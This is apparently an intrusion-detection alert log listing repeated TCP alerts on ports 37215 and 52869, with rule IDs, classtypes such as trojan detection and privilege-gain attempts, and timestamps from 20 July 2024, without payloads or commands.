                      SID:2835222
                      Source Port:46210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.763323
                      SID:2829579
                      Source Port:32850
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.051223
                      SID:2829579
                      Source Port:51544
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.404275
                      SID:2027339
                      Source Port:45050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.081693
                      SID:2027339
                      Source Port:46610
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2829579
                      Source Port:53390
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.475330
                      SID:2831300
                      Source Port:53362
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:25.632747
                      SID:2027339
                      Source Port:40660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.468948
                      SID:2027339
                      Source Port:57206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.079491
                      SID:2027339
                      Source Port:43284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.749345
                      SID:2025132
                      Source Port:34920
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:38.229203
                      SID:2027339
                      Source Port:52144
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.850879
                      SID:2831300
                      Source Port:54616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:06.633526
                      SID:2025132
                      Source Port:52838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.795410
                      SID:2027339
                      Source Port:50376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.084343
                      SID:2027339
                      Source Port:39252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.119462
                      SID:2835222
                      Source Port:45110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.143657
                      SID:2829579
                      Source Port:48880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.162298
                      SID:2027339
                      Source Port:44030
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.178719
                      SID:2027339
                      Source Port:33796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.235312
                      SID:2025132
                      Source Port:59128
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:48.772924
                      SID:2831300
                      Source Port:49468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.540434
                      SID:2831300
                      Source Port:33164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.603344
                      SID:2831300
                      Source Port:52210
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.458632
                      SID:2027339
                      Source Port:48228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.857159
                      SID:2835222
                      Source Port:51958
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.286733
                      SID:2025132
                      Source Port:47518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.861088
                      SID:2835222
                      Source Port:54822
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.560235
                      SID:2027339
                      Source Port:43376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.529848
                      SID:2025132
                      Source Port:34470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2835222
                      Source Port:53516
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2835222
                      Source Port:53914
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.676725
                      SID:2831300
                      Source Port:37242
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:34.660344
                      SID:2835222
                      Source Port:59524
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.328788
                      SID:2025132
                      Source Port:58240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:44.688793
                      SID:2027339
                      Source Port:51540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.032317
                      SID:2025132
                      Source Port:34470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:08.490661
                      SID:2027339
                      Source Port:40928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:16.084912
                      SID:2831300
                      Source Port:43190
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.594252
                      SID:2831300
                      Source Port:53870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.554753
                      SID:2831300
                      Source Port:42240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:32.673677
                      SID:2027339
                      Source Port:50066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.957923
                      SID:2835222
                      Source Port:52392
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.889998
                      SID:2835222
                      Source Port:36610
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.935593
                      SID:2027339
                      Source Port:42288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.084343
                      SID:2027339
                      Source Port:50246
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.174161
                      SID:2025132
                      Source Port:42702
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.567071
                      SID:2027339
                      Source Port:33520
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.355292
                      SID:2025132
                      Source Port:40506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.326086
                      SID:2027339
                      Source Port:50604
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.403074
                      SID:2835222
                      Source Port:58884
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.138961
                      SID:2831300
                      Source Port:48164
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.591570
                      SID:2027339
                      Source Port:34526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2829579
                      Source Port:47692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.266573
                      SID:2025132
                      Source Port:45598
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.845937
                      SID:2027339
                      Source Port:57338
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.945542
                      SID:2025132
                      Source Port:38966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:24.232736
                      SID:2831300
                      Source Port:60482
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.447330
                      SID:2027339
                      Source Port:58078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.783693
                      SID:2835222
                      Source Port:44418
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.086216
                      SID:2829579
                      Source Port:35240
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.335445
                      SID:2027339
                      Source Port:59276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.064674
                      SID:2025132
                      Source Port:52690
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.861088
                      SID:2835222
                      Source Port:33132
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2829579
                      Source Port:40212
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.459685
                      SID:2027339
                      Source Port:43962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.066314
                      SID:2027339
                      Source Port:46558
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.135626
                      SID:2829579
                      Source Port:59708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.170743
                      SID:2027339
                      Source Port:35602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.575004
                      SID:2027339
                      Source Port:40302
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.872548
                      SID:2831300
                      Source Port:57704
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.943129
                      SID:2027339
                      Source Port:55870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.066021
                      SID:2025132
                      Source Port:48680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.554912
                      SID:2829579
                      Source Port:48290
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.909656
                      SID:2831300
                      Source Port:43898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.201041
                      SID:2027339
                      Source Port:53366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.131789
                      SID:2829579
                      Source Port:36476
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:38.097414
                      SID:2027339
                      Source Port:45656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.414465
                      SID:2829579
                      Source Port:49438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.180793
                      SID:2027339
                      Source Port:33004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.347577
                      SID:2027339
                      Source Port:57250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.533759
                      SID:2829579
                      Source Port:55012
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.286487
                      SID:2027339
                      Source Port:45172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:11.377268
                      SID:2025132
                      Source Port:59454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:08.369781
                      SID:2831300
                      Source Port:58988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.938951
                      SID:2027339
                      Source Port:34674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.064635
                      SID:2027339
                      Source Port:48600
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.369944
                      SID:2027339
                      Source Port:42648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.485640
                      SID:2027339
                      Source Port:46422
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.966789
                      SID:2025132
                      Source Port:37532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:21.839686
                      SID:2025132
                      Source Port:46136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.251993
                      SID:2027339
                      Source Port:55898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.462607
                      SID:2027339
                      Source Port:51864
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.880694
                      SID:2027339
                      Source Port:40576
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.188292
                      SID:2831300
                      Source Port:36430
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.532766
                      SID:2835222
                      Source Port:37978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.133658
                      SID:2027339
                      Source Port:42852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.323623
                      SID:2835222
                      Source Port:58684
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2829579
                      Source Port:33990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.572805
                      SID:2027339
                      Source Port:34632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.648191
                      SID:2027339
                      Source Port:35836
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.529818
                      SID:2027339
                      Source Port:54356
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.472881
                      SID:2027339
                      Source Port:56468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:43.717699
                      SID:2027339
                      Source Port:49578
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.207184
                      SID:2027339
                      Source Port:59602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:34.776991
                      SID:2027339
                      Source Port:58934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.531553
                      SID:2835222
                      Source Port:38834
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.827265
                      SID:2027339
                      Source Port:55540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2835222
                      Source Port:50926
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2835222
                      Source Port:41552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.223857
                      SID:2025132
                      Source Port:44062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:58.758912
                      SID:2831300
                      Source Port:57296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:05.139331
                      SID:2025132
                      Source Port:50814
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.343227
                      SID:2835222
                      Source Port:54982
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.221844
                      SID:2835222
                      Source Port:55030
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.262795
                      SID:2025132
                      Source Port:33484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.226828
                      SID:2829579
                      Source Port:59126
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.373997
                      SID:2025132
                      Source Port:34426
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.951517
                      SID:2027339
                      Source Port:60322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.781031
                      SID:2025132
                      Source Port:59852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.036059
                      SID:2831300
                      Source Port:56264
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.119639
                      SID:2829579
                      Source Port:52726
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.140723
                      SID:2025132
                      Source Port:33926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.571555
                      SID:2829579
                      Source Port:40564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.503671
                      SID:2025132
                      Source Port:54008
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:48.795527
                      SID:2835222
                      Source Port:47692
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.534811
                      SID:2829579
                      Source Port:45060
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.054227
                      SID:2829579
                      Source Port:37728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.772622
                      SID:2831300
                      Source Port:60124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.808671
                      SID:2027339
                      Source Port:41980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.087911
                      SID:2027339
                      Source Port:58738
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.429308
                      SID:2027339
                      Source Port:59226
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.462908
                      SID:2027339
                      Source Port:52528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.282313
                      SID:2027339
                      Source Port:43206
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.584377
                      SID:2025132
                      Source Port:50454
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2829579
                      Source Port:60838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.660757
                      SID:2027339
                      Source Port:48122
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.657123
                      SID:2829579
                      Source Port:37552
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.188343
                      SID:2025132
                      Source Port:54896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.165987
                      SID:2027339
                      Source Port:39686
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.430318
                      SID:2835222
                      Source Port:37110
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.517011
                      SID:2027339
                      Source Port:60306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.971654
                      SID:2829579
                      Source Port:49478
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.022416
                      SID:2831300
                      Source Port:50004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.935123
                      SID:2025132
                      Source Port:56312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.938284
                      SID:2027339
                      Source Port:38096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.206536
                      SID:2025132
                      Source Port:57066
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.426800
                      SID:2831300
                      Source Port:56228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:38.911338
                      SID:2025132
                      Source Port:52834
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:35.526204
                      SID:2027339
                      Source Port:56102
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.339812
                      SID:2027339
                      Source Port:33566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.944157
                      SID:2835222
                      Source Port:38246
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.709620
                      SID:2025132
                      Source Port:49192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.322039
                      SID:2027339
                      Source Port:45658
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.386529
                      SID:2835222
                      Source Port:36690
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.101747
                      SID:2835222
                      Source Port:39634
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.048253
                      SID:2025132
                      Source Port:46532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.996045
                      SID:2027339
                      Source Port:50344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.324297
                      SID:2829579
                      Source Port:55798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.464393
                      SID:2027339
                      Source Port:49028
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.963776
                      SID:2027339
                      Source Port:33232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:03.235312
                      SID:2027339
                      Source Port:35130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325662
                      SID:2829579
                      Source Port:44378
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.998391
                      SID:2025132
                      Source Port:60850
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.038244
                      SID:2835222
                      Source Port:38220
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.338516
                      SID:2025132
                      Source Port:39348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:31.562284
                      SID:2027339
                      Source Port:42296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.997851
                      SID:2027339
                      Source Port:37896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.871750
                      SID:2027339
                      Source Port:35856
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.881994
                      SID:2025132
                      Source Port:37062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:39.518664
                      SID:2025132
                      Source Port:43922
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.641348
                      SID:2025132
                      Source Port:53078
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.504672
                      SID:2027339
                      Source Port:59712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2829579
                      Source Port:52616
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.119874
                      SID:2025132
                      Source Port:43536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.437584
                      SID:2829579
                      Source Port:46650
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.467111
                      SID:2027339
                      Source Port:32796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.900558
                      SID:2831300
                      Source Port:35220
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2829579
                      Source Port:53906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.772131
                      SID:2027339
                      Source Port:40134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.540943
                      SID:2027339
                      Source Port:56130
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
